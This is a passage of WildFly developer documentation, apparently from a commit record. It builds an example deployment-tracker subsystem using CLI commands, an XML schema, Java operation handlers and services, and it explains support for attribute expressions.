again:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:add\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n    \"outcome\" => \"success\",\n    \"result\" => {\"type\" => {\"war\" => {\"tick\" => 10000L}}}\n}\n----\n\nand the WildFly console should show the messages coming from the war\n`TrackerService` again.\n\nNow let us deploy something. You can find two maven projects for test\nwars already built at link:downloads\/test1.zip[test1.zip] and\nlink:downloads\/test2.zip[test2.zip]. If you download them and\nextract them to `\/Downloads\/test1` and `\/Downloads\/test2`, you can see\nthat `\/Downloads\/test1\/target\/test1.war` contains a `META-INF\/cool.txt`\nwhile `\/Downloads\/test2\/target\/test2.war` does not contain that file.\nFrom the CLI, deploy `test1.war` first:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/Downloads\/test1\/target\/test1.war\n'test1.war' deployed successfully.\n----\n\nAnd you should now see the output from the war `TrackerService` listing the\ndeployments:\n\n....\n15:35:03,712 INFO  [org.jboss.as.server.deployment] (MSC service thread 1-2) Starting deployment of \"test1.war\"\n15:35:03,988 INFO  [org.jboss.web] (MSC service thread 1-1) registering web context: \/test1\n15:35:03,996 INFO  [org.jboss.as.server.controller] (pool-2-thread-9) Deployed \"test1.war\"\n15:35:13,056 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:35:13,056 INFO  [stdout] (Thread-9) [test1.war]\n15:35:13,057 INFO  [stdout] (Thread-9) Cool: 1\n....\n\nSo our `test1.war` got picked up as a 'cool' deployment.
\nNow if we\ndeploy `test2.war`\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/sourcecontrol\/temp\/archetype-test\/test2\/target\/test2.war\n'test2.war' deployed successfully.\n----\n\nYou will see that deployment get picked up as well, but since there is no\n`META-INF\/cool.txt` it is not marked as a 'cool' deployment:\n\n....\n15:37:05,634 INFO  [org.jboss.as.server.deployment] (MSC service thread 1-4) Starting deployment of \"test2.war\"\n15:37:05,699 INFO  [org.jboss.web] (MSC service thread 1-1) registering web context: \/test2\n15:37:05,982 INFO  [org.jboss.as.server.controller] (pool-2-thread-15) Deployed \"test2.war\"\n15:37:13,075 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:37:13,075 INFO  [stdout] (Thread-9) [test1.war, test2.war]\n15:37:13,076 INFO  [stdout] (Thread-9) Cool: 1\n....\n\nAn undeploy\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] undeploy test1.war\nSuccessfully undeployed test1.war.\n----\n\nis also reflected in the `TrackerService` output:\n\n....\n15:38:47,901 INFO  [org.jboss.as.server.controller] (pool-2-thread-21) Undeployed \"test1.war\"\n15:38:47,934 INFO  [org.jboss.as.server.deployment] (MSC service thread 1-3) Stopped deployment test1.war in 40ms\n15:38:53,091 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:38:53,092 INFO  [stdout] (Thread-9) [test2.war]\n15:38:53,092 INFO  [stdout] (Thread-9) Cool: 0\n....\n\nFinally, we registered a write attribute handler for the `tick` property\nof the `type`, so we can change the frequency\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:write-attribute(name=tick,value=1000)\n{\"outcome\" => \"success\"}\n----\n\nYou should now see the output from the `TrackerService` happen every\nsecond\n\n....\n15:39:43,100 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:43,100 INFO  [stdout] (Thread-9) [test2.war]\n15:39:43,101 INFO  [stdout] (Thread-9) Cool: 0\n15:39:44,101 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:44,102 INFO  [stdout] (Thread-9) [test2.war]\n15:39:44,105 INFO  [stdout] (Thread-9) Cool: 0\n15:39:45,106 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:45,106 INFO  [stdout] (Thread-9) [test2.war]\n....\n\nIf you open `$WFLY\/standalone\/configuration\/standalone.xml` you can see\nthat our subsystem entry reflects the current state of the subsystem:\n\n[source,xml,options=\"nowrap\"]\n----\n    <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n        <deployment-types>\n            <deployment-type suffix=\"war\" tick=\"1000\"\/>\n        <\/deployment-types>\n    <\/subsystem>\n----\n\n[[expressions]]\n== Expressions\n\nExpressions are a mechanism that enables you to use variables in your\nattributes, for instance when you want the value of an attribute to be\nresolved using system or environment properties.\n\nAn example expression is\n\n....\n${jboss.bind.address.management:127.0.0.1}\n....\n\nwhich means that the value should be taken from a system property named\n`jboss.bind.address.management`, and if it is not defined, use\n`127.0.0.1`.\n\n[[what-expression-types-are-supported]]\n=== What expression types are supported\n\n* System properties, which are resolved using\n`java.lang.System.getProperty(String key)`.\n* Environment properties, which are resolved using\n`java.lang.System.getenv(String name)`.\n* Security vault expressions, resolved
\nagainst the security vault\nconfigured for the server or Host Controller that needs to resolve the\nexpression.\n\nIn all cases, the syntax for the expression is\n\n....\n${expression_to_resolve}\n....\n\nFor an expression meant to be resolved against environment properties,\nthe `expression_to_resolve` must be prefixed with `env.`. The portion\nafter `env.` will be the name passed to\n`java.lang.System.getenv(String name)`.\n\nSecurity vault expressions do not support default values (i.e. the\n`127.0.0.1` in the `jboss.bind.address.management:127.0.0.1` example\nabove).\n\n[[how-to-support-expressions-in-subsystems]]\n=== How to support expressions in subsystems\n\nThe easiest way is to use `AttributeDefinition`, which provides support\nfor expressions simply by being used correctly.\n\nWhen we create an `AttributeDefinition` all we need to do is mark that it\nallows expressions. Here is an example of how to define an attribute that\nallows expressions to be used.\n\n[source,java,options=\"nowrap\"]\n----\nSimpleAttributeDefinition MY_ATTRIBUTE =\n        new SimpleAttributeDefinitionBuilder(\"my-attribute\", ModelType.INT, true)\n                .setAllowExpression(true)\n                .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n                .setDefaultValue(new ModelNode(1))\n                .build();\n----\n\nThen later when you are parsing the xml configuration you should use the\nMY_ATTRIBUTE attribute definition to set the value on the management\noperation ModelNode you are creating.\n\n[source,java,options=\"nowrap\"]\n----\n....\n      String attr = reader.getAttributeLocalName(i);\n      String value = reader.getAttributeValue(i);\n      if (attr.equals(\"my-attribute\")) {\n          MY_ATTRIBUTE.parseAndSetParameter(value, operation, reader);\n      } else if (attr.equals(\"suffix\")) {\n.....\n----\n\nNote that this just helps you to properly set the value on the model\nnode you are working on, so there is no need to additionally set anything on the\nmodel for this attribute. The `parseAndSetParameter` method parses the value\nthat was read from the xml for possible expressions, and if it finds\nany it creates a special model node of type\n`ModelType.EXPRESSION`.\n\nLater, in your operation handlers where you implement `populateModel` and\nhave to store the value from the operation to the configuration model,\nyou also use this MY_ATTRIBUTE attribute definition.\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n        MY_ATTRIBUTE.validateAndSet(operation,model);\n }\n----\n\nThis will make sure that the attribute that is stored from the operation\nto the model is valid and nothing is lost. It also checks the value\nstored in the operation `ModelNode`, and if it isn't already\n`ModelType.EXPRESSION`, it checks if the value is a string that contains\nthe expression syntax. If so, the value stored in the model will be of\ntype `ModelType.EXPRESSION`. Doing this ensures that expressions are\nproperly handled when they appear in operations that weren't created by\nthe subsystem parser, but are instead passed in from CLI or admin\nconsole users.
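\n\nTo make this concrete, here is an illustrative snippet. Assuming an attribute like ours was built with `setAllowExpression(true)`, the configuration xml could then carry an expression instead of a literal value (the `acme.tick` system property is made up for this example), and it is the unresolved expression that ends up stored in the model:\n\n[source,xml,options=\"nowrap\"]\n----\n<deployment-type suffix=\"war\" tick=\"${acme.tick:10000}\"\/>\n----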
\n\nAs a last step we need to use the value of the attribute. This is usually\nneeded inside the `performRuntime` method\n\n[source,java,options=\"nowrap\"]\n----\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model, ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers) throws OperationFailedException {\n        ....\n        final int attributeValue = MY_ATTRIBUTE.resolveModelAttribute(context, model).asInt();\n        ...\n\n    }\n----\n\nAs you can see, the attribute's value is not resolved until it is\nneeded for use in the subsystem's runtime services. The resolved value\nis not stored in the configuration model; the unresolved expression is.\nThat way we do not lose any information in the model, and we can also\nensure that marshalling is done properly, since we must marshal back the\nunresolved value.\n\n`AttributeDefinition` also helps you with that:\n\n[source,java,options=\"nowrap\"]\n----\n public void writeContent(XMLExtendedStreamWriter writer, SubsystemMarshallingContext context) throws XMLStreamException {\n    ....\n      MY_ATTRIBUTE.marshallAsAttribute(sessionData, writer);\n      MY_OTHER_ATTRIBUTE.marshallAsElement(sessionData, false, writer);\n    ...\n}\n----\n","old_contents":"[[Example_subsystem]]\n= Example subsystem\n\nOur example subsystem will keep track of all deployments of certain\ntypes containing a special marker file, and expose operations to see how\nlong these deployments have been deployed.\n\n[[create-the-skeleton-project]]\n== Create the skeleton project\n\nTo make your life easier we have provided a maven archetype which will\ncreate a skeleton project for implementing subsystems.\n\n[source,options=\"nowrap\"]\n----\nmvn archetype:generate \\\n    -DarchetypeArtifactId=wildfly-subsystem \\\n    -DarchetypeGroupId=org.wildfly.archetypes \\\n    -DarchetypeVersion=8.0.0.Final \\\n    -DarchetypeRepository=http:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n----\n\nMaven will download the archetype and its dependencies, and ask you\nsome questions:\n\n[source,options=\"nowrap\"]\n----\n$ mvn archetype:generate \\\n    -DarchetypeArtifactId=wildfly-subsystem \\\n    -DarchetypeGroupId=org.wildfly.archetypes \\\n    -DarchetypeVersion=8.0.0.Final \\\n    -DarchetypeRepository=http:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n[INFO] Scanning for projects...\n[INFO]\n[INFO] ------------------------------------------------------------------------\n[INFO] Building Maven Stub Project (No POM) 1\n[INFO] ------------------------------------------------------------------------\n[INFO]\n\n.........\n\nDefine value for property 'groupId': : com.acme.corp\nDefine value for property 'artifactId': : acme-subsystem\nDefine value for property 'version':  1.0-SNAPSHOT: :
\nDefine value for property 'package':  com.acme.corp: : com.acme.corp.tracker\nDefine value for property 'module': : com.acme.corp.tracker\n[INFO] Using property: name = WildFly subsystem project\nConfirm properties configuration:\ngroupId: com.acme.corp\nartifactId: acme-subsystem\nversion: 1.0-SNAPSHOT\npackage: com.acme.corp.tracker\nmodule: com.acme.corp.tracker\nname: WildFly subsystem project\n Y: : Y\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 1:42.563s\n[INFO] Finished at: Fri Jul 08 14:30:09 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n$\n----\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n| |Instruction\n\n|1 |Enter the groupId you wish to use\n\n|2 |Enter the artifactId you wish to use\n\n|3 |Enter the version you wish to use, or just hit Enter if you wish to\naccept the default 1.0-SNAPSHOT\n\n|4 |Enter the java package you wish to use, or just hit Enter if you\nwish to accept the default (which is copied from groupId).\n\n|5 |Enter the module name you wish to use for your extension.\n\n|6 |Finally, if you are happy with your choices, hit Enter and Maven\nwill generate the project for you.\n|=======================================================================\n\nWe now have a skeleton project that you can use to\nimplement a subsystem. Import the `acme-subsystem` project into your\nfavourite IDE. A nice side-effect of working on it in the IDE is that you\ncan see the javadoc of WildFly classes and interfaces imported by the\nskeleton code. If you do a `mvn install` in the project it will work if\nwe plug it into WildFly, but before doing that we will change it to do\nsomething more useful.\n\nThe rest of this section modifies the skeleton project created by the\narchetype to do something more useful, and the full code can be found in\nlink:downloads\/acme-subsystem.zip[acme-subsystem.zip].\n\nIf you do a `mvn install` in the created project, you will see some\ntests being run\n\n[source,options=\"nowrap\"]\n----\n$mvn install\n[INFO] Scanning for projects...\n[...]\n[INFO] Surefire report directory: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/surefire-reports\n\n-------------------------------------------------------\n T E S T S\n-------------------------------------------------------\nRunning com.acme.corp.tracker.extension.SubsystemBaseParsingTestCase\nTests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.424 sec\nRunning com.acme.corp.tracker.extension.SubsystemParsingTestCase\nTests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\nResults :\n\nTests run: 3, Failures: 0, Errors: 0, Skipped: 0\n[...]\n----\n\nWe will talk about these later in the\n<<testing-the-parsers,Testing the\nparsers>> section.\n\n[[create-the-schema]]\n== Create the schema\n\nFirst, let us define the schema for our subsystem. Rename\n`src\/main\/resources\/schema\/mysubsystem.xsd` to\n`src\/main\/resources\/schema\/acme.xsd`.
\nThen open `acme.xsd` and modify it\nto the following\n\n[source,xml,options=\"nowrap\"]\n----\n<xs:schema xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n            targetNamespace=\"urn:com.acme.corp.tracker:1.0\"\n            xmlns=\"urn:com.acme.corp.tracker:1.0\"\n            elementFormDefault=\"qualified\"\n            attributeFormDefault=\"unqualified\"\n            version=\"1.0\">\n\n   <!-- The subsystem root element -->\n   <xs:element name=\"subsystem\" type=\"subsystemType\"\/>\n   <xs:complexType name=\"subsystemType\">\n      <xs:all>\n         <xs:element name=\"deployment-types\" type=\"deployment-typesType\"\/>\n      <\/xs:all>\n   <\/xs:complexType>\n   <xs:complexType name=\"deployment-typesType\">\n      <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\n         <xs:element name=\"deployment-type\" type=\"deployment-typeType\"\/>\n      <\/xs:choice>\n   <\/xs:complexType>\n   <xs:complexType name=\"deployment-typeType\">\n      <xs:attribute name=\"suffix\" use=\"required\"\/>\n      <xs:attribute name=\"tick\" type=\"xs:long\" use=\"optional\" default=\"10000\"\/>\n   <\/xs:complexType>\n<\/xs:schema>\n----\n\nNote that we modified the `xmlns` and `targetNamespace` values to\n`urn:com.acme.corp.tracker:1.0`. Our new `subsystem` element has a child\ncalled `deployment-types`, which in turn can have zero or more children\ncalled `deployment-type`. Each `deployment-type` has a required `suffix`\nattribute, and a `tick` attribute which defaults to `10000`.\n\nNow modify the `com.acme.corp.tracker.extension.SubsystemExtension`\nclass to contain the new namespace.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\n    \/** The name space used for the {@code subsystem} element *\/\n    public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n    ...\n----\n\n[[design-and-define-the-model-structure]]\n== Design and define the model structure\n\nThe following example xml contains a valid subsystem configuration; we\nwill see how to plug this into WildFly later in this tutorial.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n   <deployment-types>\n      <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n      <deployment-type suffix=\"war\" tick=\"10000\"\/>\n   <\/deployment-types>\n<\/subsystem>\n----\n\nNow when designing our model, we can either do a one to one mapping\nbetween the schema and the model or come up with something slightly or\nvery different. To keep things simple, let us stay pretty true to the\nschema so that when executing a `:read-resource(recursive=true)` against\nour subsystem we'll see something like:\n\n[source,options=\"nowrap\"]\n----\n{\n    \"outcome\" => \"success\",\n    \"result\" => {\"type\" => {\n        \"sar\" => {\"tick\" => \"10000\"},\n        \"war\" => {\"tick\" => \"10000\"}\n    }}\n}\n----\n\nEach `deployment-type` in the xml becomes, in the model, a child resource\nof the subsystem's root resource. The child resource's child-type is\n`type`, and it is indexed by its `suffix`. Each `type` resource then\ncontains the `tick` attribute.\n\nWe also need a name for our subsystem; to set it, change\n`com.acme.corp.tracker.extension.SubsystemExtension`:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n    ...\n    \/** The name of our subsystem within the model. *\/
\n    public static final String SUBSYSTEM_NAME = \"tracker\";\n    ...\n----\n\nOnce we are finished our subsystem will be available under\n`\/subsystem=tracker`.\n\nThe `SubsystemExtension.initialize()` method defines the model;\ncurrently it sets up the basics to add our subsystem to the model:\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n    public void initialize(ExtensionContext context) {\n        \/\/register subsystem with its model version\n        final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n        \/\/register subsystem model with subsystem definition that defines all attributes and operations\n        final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n        \/\/register describe operation, note that this can be also registered in SubsystemDefinition\n        registration.registerOperationHandler(DESCRIBE, GenericSubsystemDescribeHandler.INSTANCE, GenericSubsystemDescribeHandler.INSTANCE, false, OperationEntry.EntryType.PRIVATE);\n        \/\/we can register additional submodels here\n        \/\/\n        subsystem.registerXMLElementWriter(parser);\n    }\n----\n\nThe `registerSubsystem()` call registers our subsystem with the\nextension context. At the end of the method we register our parser with\nthe returned `SubsystemRegistration` to be able to marshal our\nsubsystem's model back to the main configuration file when it is\nmodified. We will add more functionality to this method later.\n\n[[registering-the-core-subsystem-model]]\n=== Registering the core subsystem model\n\nNext we obtain a `ManagementResourceRegistration` by registering the\nsubsystem model. This is a *compulsory* step for every new subsystem.\n\n[source,java,options=\"nowrap\"]\n----\nfinal ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n----\n\nIts parameter is an implementation of the `ResourceDefinition`\ninterface, which means that when you call\n`\/subsystem=tracker:read-resource-description` the information you see\ncomes from the model that is defined by `SubsystemDefinition.INSTANCE`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDefinition extends SimpleResourceDefinition {\n    public static final SubsystemDefinition INSTANCE = new SubsystemDefinition();\n\n    private SubsystemDefinition() {\n        super(SubsystemExtension.SUBSYSTEM_PATH,\n                SubsystemExtension.getResourceDescriptionResolver(null),\n                \/\/We always need to add an 'add' operation\n                SubsystemAdd.INSTANCE,\n                \/\/Every resource that is added, normally needs a remove operation\n                SubsystemRemove.INSTANCE);\n    }\n\n    @Override\n    public void registerOperations(ManagementResourceRegistration resourceRegistration) {\n        super.registerOperations(resourceRegistration);\n        \/\/you can register additional operations here
\n    }\n\n    @Override\n    public void registerAttributes(ManagementResourceRegistration resourceRegistration) {\n        \/\/you can register attributes here\n    }\n}\n----\n\nSince we need a child resource `type`, we will also need to add a new\n`ResourceDefinition` for it, as we will see later.\n\nThe `ManagementResourceRegistration` obtained in\n`SubsystemExtension.initialize()` is then used to add additional\noperations or to register submodels to the `\/subsystem=tracker` address.\nEvery subsystem and resource *must* have an `ADD` method, which can be\nachieved by the following line inside `registerOperations` in your\n`ResourceDefinition`, or by providing it in the constructor of your\n`SimpleResourceDefinition` just as we did in the example above.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/We always need to add an 'add' operation\n        resourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nThe parameters when registering an operation handler are:\n\n1. *The name* - i.e. `ADD`.\n2. The handler instance - we will talk more about this below.\n3. The handler description provider - we will talk more about this\nbelow.\n4. Whether this operation handler is inherited - `false` means that\nthis operation is not inherited, and will only apply to\n`\/subsystem=tracker`. The content for this operation handler will be\nprovided by `3`.\n\nLet us first look at the description provider, which is quite simple\nsince this operation takes no parameters. The addition of `type`\nchildren will be handled by another operation handler, as we will see\nlater on.\n\nThere are two ways to define a `DescriptionProvider`. One is to define it\nby hand using `ModelNode`, but as this has shown itself to be very error\nprone, there are lots of helper methods to help you automatically describe\nthe model. The following example manually defines the description provider\nfor the ADD operation handler\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n     * Used to create the description of the subsystem add method\n     *\/\n    public static DescriptionProvider SUBSYSTEM_ADD = new DescriptionProvider() {\n        public ModelNode getModelDescription(Locale locale) {\n            \/\/The locale is passed in so you can internationalize the strings used in the descriptions\n\n            final ModelNode subsystem = new ModelNode();\n            subsystem.get(OPERATION_NAME).set(ADD);\n            subsystem.get(DESCRIPTION).set(\"Adds the tracker subsystem\");\n\n            return subsystem;\n        }\n    };\n----\n\nAlternatively, you can use the API that does this for you. For add and\nremove methods there are the classes `DefaultResourceAddDescriptionProvider`\nand `DefaultResourceRemoveDescriptionProvider` that do the work for you.\nIf you use `SimpleResourceDefinition`, even that part is hidden from you.\n\n[source,java,options=\"nowrap\"]\n----\nresourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\nresourceRegistration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nFor other operation handlers that are not add\/remove you can use\n`DefaultOperationDescriptionProvider`, which takes the name of the\noperation as an additional parameter, plus an optional array of the\nparameters\/attributes the operation takes.
\nHere is an example registering the operation `add-mime` with two\nparameters:\n\n[source,java,options=\"nowrap\"]\n----\ncontainer.registerOperationHandler(\"add-mime\",\n                MimeMappingAdd.INSTANCE,\n                new DefaultOperationDescriptionProvider(\"add-mime\", Extension.getResourceDescriptionResolver(\"container.mime-mapping\"), MIME_NAME, MIME_VALUE));\n----\n\n[NOTE]\nWhen describing an operation, its description provider's `OPERATION_NAME`\nmust match the name used when calling\n`ManagementResourceRegistration.registerOperationHandler()`.\n\nNext we have the actual operation handler instance. Note that we have\nchanged its `populateModel()` method to initialize the `type` child of\nthe model.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemAdd extends AbstractBoottimeAddStepHandler {\n\n    static final SubsystemAdd INSTANCE = new SubsystemAdd();\n\n    private SubsystemAdd() {\n    }\n\n    \/** {@inheritDoc} *\/\n    @Override\n    protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n        log.info(\"Populating the model\");\n        \/\/Initialize the 'type' child node\n        model.get(\"type\").setEmptyObject();\n    }\n    ....\n----\n\n`SubsystemAdd` also has a `performBoottime()` method which is used for\ninitializing the deployer chain associated with this subsystem. We will\ntalk about the deployers later on. However, the basic idea for all\noperation handlers is that we do any model updates before changing the\nactual runtime state.\n\nThe rule of thumb is that everything that can be added can also be\nremoved, so we have a remove handler for the subsystem, registered\nin `SubsystemDefinition.registerOperations` or provided as the operation\nhandler in the constructor.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Every resource that is added, normally needs a remove operation\n        registration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\n`SubsystemRemove` extends `AbstractRemoveStepHandler`, which takes care\nof removing the resource from the model, so we don't need to override its\n`performRemove()` operation. Also, the add handler did not install any\nservices (services will be discussed later), so we can delete the\n`performRuntime()` method generated by the archetype.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemRemove extends AbstractRemoveStepHandler {\n\n    static final SubsystemRemove INSTANCE = new SubsystemRemove();\n\n    private final Logger log = Logger.getLogger(SubsystemRemove.class);\n\n    private SubsystemRemove() {\n    }\n}\n----\n\nThe description provider for the remove operation is simple and quite\nsimilar to that of the add handler, where just the name of the operation\nchanges.\n\n[[registering-the-subsystem-child]]\n=== Registering the subsystem child\n\nThe `type` child does not exist in our skeleton project so we need to\nimplement the operations to add and remove them from the model.\n\nFirst we need an add operation to add the `type` child. Create a class\ncalled `com.acme.corp.tracker.extension.TypeAddHandler`. In this case we\nextend the `org.jboss.as.controller.AbstractAddStepHandler` class and\nimplement the `org.jboss.as.controller.descriptions.DescriptionProvider`\ninterface.
\n`org.jboss.as.controller.OperationStepHandler` is the main\ninterface for the operation handlers, and `AbstractAddStepHandler` is an\nimplementation of that which does the plumbing work for adding a\nresource to the model.\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeAddHandler extends AbstractAddStepHandler implements DescriptionProvider {\n\n    public static final TypeAddHandler INSTANCE = new TypeAddHandler();\n\n    private TypeAddHandler() {\n    }\n----\n\nThen we define the subsystem model. Let's call it `TypeDefinition`, and for\nease of use let it extend `SimpleResourceDefinition` instead of just\nimplementing `ResourceDefinition`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeDefinition extends SimpleResourceDefinition {\n\n    public static final TypeDefinition INSTANCE = new TypeDefinition();\n\n    \/\/we define an attribute named tick\n    protected static final SimpleAttributeDefinition TICK =\n            new SimpleAttributeDefinitionBuilder(TrackerExtension.TICK, ModelType.LONG)\n                    .setAllowExpression(true)\n                    .setXmlName(TrackerExtension.TICK)\n                    .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n                    .setDefaultValue(new ModelNode(1000))\n                    .setAllowNull(false)\n                    .build();\n\n    private TypeDefinition(){\n        super(TYPE_PATH, TrackerExtension.getResourceDescriptionResolver(TYPE),TypeAdd.INSTANCE,TypeRemove.INSTANCE);\n    }\n\n    @Override\n    public void registerAttributes(ManagementResourceRegistration resourceRegistration){\n        resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n    }\n}\n----\n\nThis takes care of describing the model for us. As you can see in the\nexample above, we define a `SimpleAttributeDefinition` named `TICK`; this\nis a mechanism to define attributes in a more type safe way and to get a\ncommon API for manipulating attributes. Here we define a default value of\n1000, as well as other constraints and capabilities. Other properties\ncould also be set, such as validators, alternate names, the xml name,\nflags marking whether the attribute allows expressions, and more.
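\n\nFor example, a validator could be set on the builder to constrain the allowed values. This is an illustrative variation rather than part of the tutorial code; it assumes the `org.jboss.as.controller.operations.validation.LongRangeValidator` validator class:\n\n[source,java,options=\"nowrap\"]\n----\n    \/\/Illustrative only: the validator rejects tick values below 1 when the operation executes\n    protected static final SimpleAttributeDefinition TICK =\n            new SimpleAttributeDefinitionBuilder(TrackerExtension.TICK, ModelType.LONG)\n                    .setAllowExpression(true)\n                    .setXmlName(TrackerExtension.TICK)\n                    .setValidator(new LongRangeValidator(1, Long.MAX_VALUE, false, true))\n                    .setDefaultValue(new ModelNode(1000))\n                    .build();\n----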
\n\nThen we do the work of updating the model by implementing the\n`populateModel()` method from the `AbstractAddStepHandler`, which\npopulates the model's attribute from the operation parameters. First we\nget hold of the model relative to the address of this operation (we will\nsee later that we will register it against `\/subsystem=tracker\/type=*`),\nso we just specify an empty relative address, and we then populate our\nmodel with the parameters from the operation. There is an operation\n`validateAndSet` on `AttributeDefinition` that helps us validate and set\nthe model based on the definition of the attribute.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n    protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n        TICK.validateAndSet(operation,model);\n    }\n----\n\nWe then override the `performRuntime()` method to perform our runtime\nchanges, which in this case involves installing a service into the\ncontroller at the heart of WildFly\n(`AbstractAddStepHandler.performRuntime()` is similar to\n`AbstractBoottimeAddStepHandler.performBoottime()` in that the model is\nupdated before runtime changes are made).\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n    protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model,\n            ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n            throws OperationFailedException {\n        String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n        long tick = TICK.resolveModelAttribute(context,model).asLong();\n        TrackerService service = new TrackerService(suffix, tick);\n        ServiceName name = TrackerService.createServiceName(suffix);\n        ServiceController<TrackerService> controller = context.getServiceTarget()\n                .addService(name, service)\n                .addListener(verificationHandler)\n                .setInitialMode(Mode.ACTIVE)\n                .install();\n        newControllers.add(controller);\n    }\n}\n----\n\nSince the add methods will be of the format\n`\/subsystem=tracker\/type=war:add(tick=1234)`, we look for the last\nelement of the operation address, which is `war` in the example just\ngiven, and use that as our suffix. We then create an instance of\nTrackerService, install that into the `service target` of the context,\nand add the created `service controller` to the `newControllers` list.\n\nThe tracker service is quite simple. All services installed into WildFly\nmust implement the `org.jboss.msc.service.Service` interface.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TrackerService implements Service<TrackerService>{\n----\n\nWe then have some fields to keep the tick count and a thread which, when\nrun, outputs all the deployments registered with our service.\n\n[source,java,options=\"nowrap\"]\n----\nprivate AtomicLong tick = new AtomicLong(10000);\n\n    private Set<String> deployments = Collections.synchronizedSet(new HashSet<String>());\n    private Set<String> coolDeployments = Collections.synchronizedSet(new HashSet<String>());\n    private final String suffix;\n\n    private Thread OUTPUT = new Thread() {\n        @Override\n        public void run() {\n            while (true) {\n                try {\n                    Thread.sleep(tick.get());\n                    System.out.println(\"Current deployments deployed while \" + suffix + \" tracking active:\\n\" + deployments\n                        + \"\\nCool: \" + coolDeployments.size());\n                } catch (InterruptedException e) {\n                    interrupted();\n                    break;\n                }\n            }\n        }\n    };\n\n    public TrackerService(String suffix, long tick) {\n        this.suffix = suffix;\n        this.tick.set(tick);\n    }\n----\n\nNext we have three methods which come from the `Service` interface.\n`getValue()` returns this service, `start()` is called when the service\nis started by the controller, and `stop()` is called when the service is\nstopped by the controller; they start and stop the thread outputting\nthe deployments.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n    public TrackerService getValue() throws IllegalStateException, IllegalArgumentException {\n        return this;\n    }\n\n    @Override\n    public void start(StartContext context) throws StartException {\n        OUTPUT.start();\n    }\n\n    @Override\n    public void stop(StopContext context) {\n        OUTPUT.interrupt();\n    }\n----\n\nNext we have a utility method to create the `ServiceName` which is used\nto register the service in the controller.\n\n[source,java,options=\"nowrap\"]\n----\npublic static ServiceName createServiceName(String suffix) {\n    return ServiceName.JBOSS.append(\"tracker\", suffix);\n}\n----\n
